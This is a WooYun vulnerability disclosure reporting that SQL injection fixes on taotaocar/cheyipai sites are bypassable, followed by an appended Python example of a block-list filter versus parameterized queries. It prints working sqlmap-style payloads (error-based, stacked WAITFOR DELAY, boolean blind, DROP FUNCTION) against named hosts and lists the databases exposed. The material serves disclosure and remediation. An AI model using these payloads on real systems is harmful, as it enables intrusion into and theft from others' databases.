Vulnerability summary

Bug ID: wooyun-2015-096053

Title: 车易拍 SQL injection (2)

Vendor: cheyipai.com

Author: 紫霞仙子

Submitted: 2015-02-07 12:52

Fixed: 2015-03-24 12:54

Disclosed: 2015-03-24 12:54

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: Confirmed by the vendor

Source: http://www.wooyun.org

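Vulnerability details

Disclosure status:

2015-02-07: Details sent to the vendor; waiting for the vendor to respond
2015-02-09: Vendor has confirmed; details disclosed to the vendor only
2015-02-19: Details disclosed to core white hats and experts in related fields
2015-03-01: Details disclosed to regular white hats
2015-03-11: Details disclosed to trainee white hats
2015-03-24: Details disclosed to the public

Brief description:

233

Detailed description:

I found a problem: your method of fixing SQL injection is incomplete and can probably be bypassed very easily. I just re-ran your SQL vulnerabilities, and apart from the sites that have been shut down, almost all of them can still be bypassed.
payload: replace spaces with /**/

Proof of vulnerability: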
http://m.taotaocar.com:80/paimai/index.aspx (POST)
---
Parameter: car_is_sale (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0' AND 4516=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4516=4516) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'kDNv'='kDNv&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0'; WAITFOR DELAY '0:0:5'--&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0' WAITFOR DELAY '0:0:5'--&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
Parameter: usertype (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=-8016' OR (2970=2970) AND 'WeeK'='WeeK&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA' AND 6637=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6637=6637) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(113))) AND 'qgEx'='qgEx&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA'; WAITFOR DELAY '0:0:5'--&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMTE0NzQxODc1DxYMHgtjYXJfaXNfc2FsZQUBMB4JY2FyX21vbmV5BQox5LiH5Lul5LiLHgpjYXJfbW9uZXliBQEwHghrZXl3b3JkcwUCMTIeCHVzZXJ0eXBlBQbkuKrkuroeCHdoZXJlU3RyBZMBIGFuZCBldGltZT5nZXRkYXRlKCkgYW5kIGNhcl9pc19zYWxlPTAgYW5kIGNhcl9tb25leWI+MCBhbmQgdXNlcnR5cGU9J+S4quS6uicgYW5kIGNhcl9tb25leTw9MTAwMDAgYW5kIChrZXl3b3JkcyBsaWtlICclMTIlJyBvciBqY2FyaWQgbGlrZSAnJTEyJScpFgICAw9kFgQCAg8WAh4LXyFJdGVtQ291bnRmZAIDDw8WAh4LUmVjb3JkY291bnRmZGRkdTTY8E6LWSweLSE2EQJA6MnJWAY=&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEWAgLSq8K8CQL0nNqKDIeMR3Q8zuWOA6wRYJGUcrvTrzMu&car_is_sale=0&car_moneyb=0&usertype=%E4%B8%AA%E4%BA%BA' WAITFOR DELAY '0:0:5'--&car_money=1%E4%B8%87%E4%BB%A5%E4%B8%8B&keywords=12&Btn_seach=%E6%90%9C%E7%B4%A2
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
available databases [8]:
[*] 2dazi
[*] master
[*] model
[*] msdb
[*] taocar_db_122
[*] tempdb
[*] test
[*] xcnews
-----------------------------------
http://xinche.taotaocar.com/xinche/quanguobaojia.aspx?classid=161011001
Parameter: classid (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: classid=161011001'; IF(5896=5896) SELECT 5896 ELSE DROP FUNCTION kNRt--
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: classid=161011001' AND 7121=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (7121=7121) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(112)+CHAR(106)+CHAR(113))) AND 'YJEc'='YJEc
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: classid=161011001'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: classid=161011001' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
available databases [8]:
[*] 2dazi
[*] master
[*] model
[*] msdb
[*] taocar_db_122
[*] tempdb
[*] test
[*] xcnews

Suggested fix:

Redesign the fix.

Copyright notice: when reposting, please credit the source 紫霞仙子@乌云
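What "redesign the fix" can mean in practice, as an added example that is not part of the original report or the vendor's code: a keyword filter that relies on whitespace next to a bound-parameter query with type validation. Python's sqlite3 stands in for the ASP.NET / SQL Server stack; the table, its columns, the filter regex and the sample rows are assumptions constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cars (id INTEGER, usertype TEXT, car_is_sale INTEGER)")
    db.executemany("INSERT INTO cars VALUES (?, ?, ?)",
                   [(1, "personal", 0), (2, "dealer", 0), (3, "dealer", 1)])
    return db

# Assumed shape of the incomplete fix: reject SQL keywords delimited by whitespace.
BLOCKLIST = re.compile(r"\s(or|and|select|union|waitfor)\s", re.IGNORECASE)

def blocklist_allows(value):
    return BLOCKLIST.search(value) is None

def search_concat(db, usertype):
    """'Before': filter the value, then concatenate it into the SQL text."""
    if not blocklist_allows(usertype):
        raise ValueError("rejected by filter")
    sql = ("SELECT id FROM cars WHERE car_is_sale = 0 AND usertype = '"
           + usertype + "'")
    return [row[0] for row in db.execute(sql)]

def search_param(db, usertype, car_is_sale="0"):
    """Redesigned: validate the numeric field by type and bind every value."""
    if not re.fullmatch(r"[01]", car_is_sale):
        raise ValueError("car_is_sale must be 0 or 1")
    sql = "SELECT id FROM cars WHERE car_is_sale = ? AND usertype = ?"
    return [row[0] for row in db.execute(sql, (int(car_is_sale), usertype))]

# Constructed test inputs: the same value with spaces, and with the
# space-to-comment substitution the report describes.
SPACED = "x' OR '1'='1"
COMMENTED = SPACED.replace(" ", "/**/")

if __name__ == "__main__":
    db = make_db()
    print("filter blocks spaced form:   ", not blocklist_allows(SPACED))
    print("filter blocks commented form:", not blocklist_allows(COMMENTED))
    print("concatenated query returns:  ", search_concat(db, COMMENTED))
    print("parameterized query returns: ", search_param(db, COMMENTED))
```

The filter stops only the spelling it anticipated, while the bound query treats the whole value as data no matter how it is written.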


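Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 15

Confirmed: 2015-02-09 16:08

Vendor reply:

Investigation has started; thank you for the submission.

Latest status:

None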